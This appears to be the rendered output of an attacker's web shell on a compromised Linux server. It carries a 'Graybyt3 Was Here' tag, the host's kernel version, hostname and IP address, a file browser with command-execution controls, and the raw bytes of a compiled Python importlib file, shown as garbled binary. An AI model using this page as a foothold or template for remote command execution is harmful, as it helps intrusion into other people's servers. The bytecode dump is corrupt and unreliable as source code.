Graybyt3 Was Here
Linux host1.absolutelystunningcenterpieces.com 3.10.0-957.21.3.el7.x86_64 #1 SMP Tue Jun 18 16:35:19 UTC 2019 x86_64
Apache
69.167.136.200
/
opt
/
alt
/
python-internal
/
lib64
/
python3.11
/
importlib
/
resources
/
__pycache__
[ HOME ]
Exec
Submit
readers.cpython-311.opt-1.pyc
� !A?h� � �� � d dl Z d dlZd dlZd dlZddlmZ ddlmZ d� Z G d� dej � � Z G d� d ej � � Z G d � dej � � Z G d� d ej � � ZdS )� N� )�abc)�unique_everseenc �Z � t t j � | � � � � S �N)�iter�collections�OrderedDict�fromkeys)�itemss �H/opt/alt/python-internal/lib64/python3.11/importlib/resources/readers.py�remove_duplicatesr s! � ���'�0�0��7�7�8�8�8� c � � e Zd Zd� Zd� Zd� ZdS )� FileReaderc �L � t j |j � � j | _ d S r )�pathlib�Path�path�parent)�self�loaders r �__init__zFileReader.__init__ s � ��L���-�-�4�� � � r c �P � t | j � |� � � � S �z{ Return the file system path to prevent `resources.path()` from creating a temporary copy. ��strr �joinpath�r �resources r � resource_pathzFileReader.resource_path �"